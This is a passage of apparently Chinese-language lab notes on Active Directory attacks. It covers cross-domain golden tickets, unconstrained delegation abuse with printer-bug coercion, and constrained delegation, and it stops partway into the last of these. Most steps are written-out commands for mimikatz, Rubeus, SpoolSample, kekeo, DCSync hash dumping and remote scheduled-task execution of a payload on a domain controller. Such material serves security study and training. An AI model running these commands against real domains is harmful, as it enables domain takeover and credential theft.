<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID-<br>519 /krbtgt:krbtgt散列 /ptt<br>Kerberos::golden /user:administrator /domain:son.hsmyzj.xyz /sid:S-1-5-21-3711810844-2552107112-2058687077 /sids:S-1-5-21-2640154217-865433244-3862815811-519 /krbtgt:b04274bd0c5c8098dfcca559441b9f29 /ptt<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382542996-ada79f4b-2fdd-4d64-a7a0-3055f5c38b98.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>访问目标域</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">dir \\AD-2016-hsmyzj.xyz\c$<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711515190381-7a78562d-469b-4876-8ece-bd45a19f7c51.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>复制恶意文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">copy 1.exe \\AD-2016.hsmyzj.xyz\c$<br></code></pre></td></tr></table></figure>

<p>执行计划任务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">schtasks /create /s AD-2016.hsmyzj.xyz /tn test /sc onstart /tr c:\1.exe /ru system /f<br></code></pre></td></tr></table></figure>

<p>启动计划任务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">schtasks /run /s AD-2016.hsmyzj.xyz /i /tn &quot;test&quot;<br></code></pre></td></tr></table></figure>

<p>成功上线</p>
<h2 id="域内委派攻击概述"><a href="#域内委派攻击概述" class="headerlink" title="域内委派攻击概述"></a>域内委派攻击概述</h2><h3 id="委派是什么"><a href="#委派是什么" class="headerlink" title="委派是什么"></a>委派是什么</h3><p>我们先看一下kerberos协议</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382922004-0e39beba-bb5e-416a-817c-229d29ed420b.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>我们要去买票，但是自己又不想去，我们就可以委托中间商，给我们买票，这个就是委派</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382931194-5b56a418-39bd-435f-8368-deddf5f32e68.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>域委派是指将域内用户的权限委派给服务账户，使得服务账号能够以用户的权限在域内展开活动。</p>
<p>委派是域中的一种安全设置，可以允许某个机器上的服务代表某个用户去执行某个操作，主要分为三 种：</p>
<p>1、非约束性委派</p>
<p>2、约束性委派</p>
<p>3、基于资源的约束性委派</p>
<h3 id="委派攻击的工作场景"><a href="#委派攻击的工作场景" class="headerlink" title="委派攻击的工作场景"></a>委派攻击的工作场景</h3><p>一个域内用户访问WEB服务，但是一些资源在文件服务上，这个时候就需要委派攻击</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382893047-dd43891f-0dc0-4841-9096-ef310ec9bed0.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>怎么设置委派</strong></p>
<p>在域内只有主机账号和服务账号才有委派属性</p>
<p>主机账号：活动目录中的computers组内的计算机，也被称为机器账号。</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711520740381-c24e0890-9a85-446f-9f8b-6254f4920d53.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>服务账号：域内用户的一种类型，是服务器运行服务时所用的账号，将服务运行起来加入域内，比如： SQLServer,MYSQL等；域用户通过注册SPN也能成为服务账号。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">net user test123 Abc123.. /add /domain 创建一个普通用户<br>setspn -U -A priv/test test123 注册为服务账号<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711520778318-f8e195e1-054e-426e-98e9-3028fce8d5e2.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>开启委派如图</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383018857-77929894-c396-43c1-8a70-07fbb21a1080.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="非约束委派攻击"><a href="#非约束委派攻击" class="headerlink" title="非约束委派攻击"></a>非约束委派攻击</h2><h3 id="非约束委派使用场景"><a href="#非约束委派使用场景" class="headerlink" title="非约束委派使用场景"></a>非约束委派使用场景</h3><p>从使用的角度：用户张三访问一台机器A，于是向DC发起认证，  DC会检查A的机器账号的属性，如果是非约束委派的话，会把用户的TGT放在ST票据中并一起发送给A,这样A在验证ST票据的同时也获取到了  用户的TGT，并把TGT储存在自己的lsass进程中以备下次重用，从而A就可以使用这个TGT，来模拟这个张三访问任何服务。</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383223302-dcf12b4e-ea26-43b9-a303-d1fc8ac7050d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>从攻击角度来说：如果攻击者拿到了一台配置了非约束委派的机器权限，可以诱导管理员来访问该机器，然后可以得到管理员的TGT，从而模拟管理员访问任意服务，相当于拿下了整个域环境，或者结合打印机漏洞让域管用户强制回连以缓存TGT</p>
<p>一个域内用户访问WEB服务，但是一些资源在文件服务上，这个时候就需要委派，需要web系统代表用 户A去访问文件服务的资源<br><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383231030-6b2e03d1-a3a4-4c7f-b505-62255dd8d19a.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="非约束委派的漏洞"><a href="#非约束委派的漏洞" class="headerlink" title="非约束委派的漏洞"></a>非约束委派的漏洞</h3><p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383249321-309e387a-a95c-4ba9-86be-9620f47fc080.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>如果是域管访问web系统，我们就可以通过web系统伪造域管的身份登录域控</p>
<h3 id="利用非约束委派域控主动访问控制域"><a href="#利用非约束委派域控主动访问控制域" class="headerlink" title="利用非约束委派域控主动访问控制域"></a>利用非约束委派域控主动访问控制域</h3><p>实验环境如下：</p>
<table>
<thead>
<tr>
<th><strong>机器位置</strong></th>
<th><strong>机器****IP</strong></th>
<th><strong>机器****名</strong></th>
<th><strong>机器登录用户</strong></th>
<th><strong>所属域</strong></th>
<th><strong>委派配置</strong></th>
</tr>
</thead>
<tbody><tr>
<td>域内域控制</td>
<td><a target="_blank" rel="noopener" href="https://192.168.41.10/">192.168.</a>3.191</td>
<td>AD-2016</td>
<td>hsmyzj\administrator</td>
<td>hsmyzj.xyz</td>
<td>域控</td>
</tr>
<tr>
<td>域内机器</td>
<td><a target="_blank" rel="noopener" href="https://192.168.41.184/">192.168.</a>3.190</td>
<td>web-2012</td>
<td>hack\test123</td>
<td>hsmyzj.xyz</td>
<td></td>
</tr>
</tbody></table>
<p>实验前提：控制了域内的一台机器pc-web，并且该机器的服务账号配置了非约束委派，如下：</p>
<p>1、使用Adﬁnd查询域内非约束委派机器账号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">AdFind.exe -b &quot;DC=hsmyzj,DC=xyz&quot; -f &quot;(&amp;(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; cn distinguishedName<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711521479559-b0000688-03db-4162-ad01-c5cb2b30e5e0.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>查询具有委派的服务账号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">AdFind.exe -b &quot;DC=hsmyzj,DC=xyz&quot; -f &quot;(&amp;(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; -dn<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711521586816-78cb3632-6a16-4328-8277-dde9b44ec55e.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>2、我们先去访问域控，是不能访问的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">dir \\AD-2016.hsmyzj.xyz\c$<br></code></pre></td></tr></table></figure>

<p>3、这个时候如果域管访问了pc-web机器我们的内存中就会有域管的TGT，就可以访问任意机器了，在与域控上执行访问PC-WEB(在域控上执行)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">net use \\web-2012.hsmyzj.xyz /user:hsmyzj\administrator Abc123..<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711521832627-78e9ea8c-8345-489a-a031-cb9ca65372f2.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>4、去pc-web导出内存中的票据(要提权才能运行，这里直接传上去工具弄了)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">sekurlsa::tickets /export<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711524429877-2eec625a-a3e1-4bf7-ae79-4dda69433257.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>5、进行票据传递就可以获取域控的权限了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">mimikatz kerberos::ptt [0;30294]-2-0-40e10000-test123@krbtgt-HSMYZJ.XYZ.kirbi<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711524600944-fdcbd5eb-3553-46c9-82d3-48c9763ee972.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>6、访问域控</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell dir \\AD-2016.hsmyzj.xyz\c$<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711524664400-29b5ea77-b0a1-4dbd-b8c2-57964e253c8a.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>7、使用计划任务，服务，或者无文件的powershell上线</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">copy 123.exe \\AD-2016.hsmyzj.xyz\C$<br>shell schtasks /create /s AD-2016.hsmyzj.xyz /tn test /sc onstart /tr c:\123.exe /ru system /f<br>shell schtasks /run /s AD-2016.hsmyzj.xyz /i /tn &quot;test&quot;<br></code></pre></td></tr></table></figure>



<h3 id="利用非约束委派域控被动访问控制域控"><a href="#利用非约束委派域控被动访问控制域控" class="headerlink" title="利用非约束委派域控被动访问控制域控"></a>利用非约束委派域控被动访问控制域控</h3><table>
<thead>
<tr>
<th><strong>机器位置</strong></th>
<th><strong>机器****IP</strong></th>
<th><strong>机器****名</strong></th>
<th><strong>机器登录用户</strong></th>
<th><strong>所属域</strong></th>
<th><strong>委派配置</strong></th>
</tr>
</thead>
<tbody><tr>
<td>域内域控制</td>
<td><a target="_blank" rel="noopener" href="https://192.168.41.10/">192.168.</a>3.191</td>
<td>AD-2016</td>
<td>hsmyzj\administrator</td>
<td>hsmyzj.xyz</td>
<td>域控</td>
</tr>
<tr>
<td>域内机器</td>
<td><a target="_blank" rel="noopener" href="https://192.168.41.184/">192.168.</a>3.190</td>
<td>web-2012</td>
<td>hack\test123</td>
<td>hsmyzj.xyz</td>
<td></td>
</tr>
</tbody></table>
<p>实验前提：控制了域内的一台机器OA，并且该机器的服务账号配置了非约束委派，如下：</p>
<p>一般域管不会主动访问我们，我们可以利用Windows打印系统远程协议（MS-RPRN）中的一种旧的</p>
<p>但是默认启用的方法，在该方法中，域用户可以使用MS-RPRN</p>
<p>RpcRemoteFindFirstPrinterChangeNotification(Ex) 方法强制任何运行了Spooler 服务的计算机以通过Kerberos或NTLM 对攻击者选择的目标进行身份验证。非约束性委派主机结合Spooler打印机服务漏洞，让域控机器 DC 强制访问已控的具有本地管理员权限的非约束性委派机器 OA ，从而拿到域管理员的TGT，进而接管域控。（要.NET 2008机器可能复现不了，因为版本的问题）</p>
<p>1、首先利用Rubeus在 OA 上以本地管理员权限执行以下命令，每隔一秒监听来自域控机器 DC 的登录 信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">Rubeus.exe monitor /interval:1 /filteruser:AD-2016$<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711539904599-d399dae2-f62d-4b9c-8af4-73d33cfd086d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>再利用SpoolSample强制域控打印机回连，需在域用户进程上执行，所以这里切换成了普通域用户帐号 去执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">SpoolSample.exe AD-2016 web-2016<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711539924849-d7d4c409-c3dd-4a05-a01b-c08d70ec1ec1.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711541133744-63dd01b2-727b-460b-a794-3e8c589bfbf8.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>Rubeus监听到票据后，Rubeus导入票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">Rubeus.exe ptt /ticket:票据<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383782024-aa778b1d-197b-46ac-9b0d-553c7e623151.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>获取域内用户的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">lsadump::dcsync /all /csv<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711525041860-2c5e66e1-34ef-4a86-aeab-8d5478a75117.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>导入票据即可</p>
<h3 id="构造服务账户票据控制域控"><a href="#构造服务账户票据控制域控" class="headerlink" title="构造服务账户票据控制域控"></a>构造服务账户票据控制域控</h3><p>实验前提</p>
<ol>
<li>服务账户设置了非约束性委派</li>
<li>已知服务账户的密码口令信息</li>
</ol>
<p>1、使用 adﬁnd发现服务账号test设置了非约束委派</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">AdFind.exe -b &quot;DC=hsmyzj,DC=xyz&quot; -f &quot;(&amp;(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; -dn<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383882371-125bb49e-b737-4a18-98ce-4ec6327f1693.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>2、构造服务账户TGT的票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">kekeo.exe &quot;tgt::ask /user:test123 /domain:hsmyzj.xyz /password:Abc123..<br>/ticket:test123.kirbi&quot; &quot;exit&quot;<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383899546-d14d96ee-5327-4ab8-8379-dd7d47b54f9c.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>3、利用刚才伪造的TGT票据，向域服务器申请CIFS服务票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">kekeo.exe &quot;Tgs::s4u /tgt:TGT_test@HACK.COM_krbtgt~hack.com@HACK.COM.kirbi<br>/user:administrator@hack.com /service:cifs/DC.HACK.COM&quot; &quot;exit&quot;<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383917111-9c30f67b-f831-460e-b2cd-f41e38a2b837.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用mimikatz将该票据注入当前的会话中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">mimikatz kerberos::ptt TGS_administrator@hack.com@HACK.COM_test@HACK.COM.kirbi<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383930918-cbbc564e-88ac-4dfe-b827-f67e465a1355.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>访问域控</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">shell  dir \\dc.hack.com\c$<br></code></pre></td></tr></table></figure>



<h2 id="约束性委派攻击"><a href="#约束性委派攻击" class="headerlink" title="约束性委派攻击"></a>约束性委派攻击</h2><h3 id="约束性委派场景"><a href="#约束性委派场景" class="headerlink" title="约束性委派场景"></a>约束性委派场景</h3><p>当这个用户不在域内，他在出差，不能使用kerberos去认证，只能使用其他协议认证web系统，那同样 WEB系统也需要访问文件服务的资源，这个时候如何认证呢？</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709384319650-f3fe4166-7777-44a6-9628-6bcca004d250.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>Widnows Server 2003 之后微软引入了非约束委派。由于非约束委派的不安全性或者场景受限（配置了 非约束委派的机器在LSASS 中缓存了用户的TGT 票据可模拟用户去访问域中任意服务），微软于2007</p>
<p>年为Kerberos协议进行扩展引入S4U(service for user)协议，该协议分为两个子协议</p>
<p>1、S4u2self（ Service for User to Self）</p>
<p>2、S4U2proxy（ Service for User to Proxy）</p>
<p>这两个扩展都允许服务代表用户从KDC请求票证。</p>
<p>约束委派限制了S4U2proxy协议的请求范围，使得配置了委派属性的服务只能模拟用户身份访问<strong>特定</strong>的 其他服务</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709384329428-fd4365e2-6bb9-46a3-8659-9f3293d34c01.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>存在的问题</p>
<p>1、服务账号B可以代表A申请访问B的票据，那么可不可以代表域管申请域管访问B的票据呢？在这个过 程中，不需要域管参与，服务B自身就可以完成</p>
<p>2、服务账号B可以代表A申请访问C的票据，那么可不可以代表域管申请域管访问C的票据呢？在这个过 程中，不需要域管参与，服务B自身就可以完成</p>
<h3 id="约束性委派攻击流程"><a href="#约束性委派攻击流程" class="headerlink" title="约束性委派攻击流程"></a>约束性委派攻击流程</h3><p>用户（A）访问WEB系统（B）,B代表A去向KDC申请访问B的TGT和ST1(使用S4u2self),用户A拿到了ST1 就可以访问B了，如果在B上配置了约束性委派（A到C的约束委派），则B能够使用S4U2Proxy协议将用 户发给自己的可转发的ST1票据以用户的身份发给KDC,KDC返回B一个访问C的票据ST2，这样B就可以   以用户的身份访问C</p>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709384346896-9fd64334-13ae-41ab-9cfc-b4b12722d712.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plain">1.通过NTLM或者其他认证<br>2.B代表A申请A访问B的票据(TGT和ST1)<br>3.KDC返回用户的TGT和ST1票据给B<br>4.B把ST1票据给A<br>5.A用ST1去访问B<br>6.B拿着A的ST1作为证据，去申请访问C的ST2<br>7.B用ST2票据访问C<br></code></pre></td></tr></table></figure>

<p>存在的问题是什么呢？</p>
<p>B会获取A的TGT,只要能伪造A的TGT,就可以用TGT申请ST1票据（伪造管理员申请ST1票据）</p>
<h3 id="实验场景"><a href="#实验场景" class="headerlink" title="实验场景"></a>实验场景</h3><p>实验场景如下：</p>
<table>
<thead>
<tr>
<th><strong>机器位置</strong></th>
<th><strong>机器****IP</strong></th>
<th><strong>机器名</strong></th>
<th><strong>机器登录用户</strong></th>
<th><strong>所属域</strong></th>
<th><strong>委派配置</strong></th>
</tr>
</thead>
<tbody><tr>
<td>域内域控制 器</td>
<td><a target="_blank" rel="noopener" href="https://192.168.41.10/">192.168.</a>3.191</td>
<td>AD-2016</td>
<td>hsmyzj\administrator</td>
<td>hsmyzj.xyz</td>
<td>域控</td>
</tr>
<tr>
<td>域内机器</td>
<td><a target="_blank" rel="noopener" href="https://192.168.41.15/">192.168.</a>3.187</td>
<td>web-2016</td>
<td>hsmyzj\test123</td>
<td>hsmyzj.xyz</td>
<td>配置了约束委派</td>
</tr>
</tbody></table>
<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711553072070-981d078b-271a-4226-882a-03d031a0f4ac.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>实验前提：我们已经控制了test123的电脑，发现该电脑配置了约束性的委派，并且可以读取到该电脑的机器 用户的HASH值</p>
<p>1、查询约束性委派的机器和用户</p>
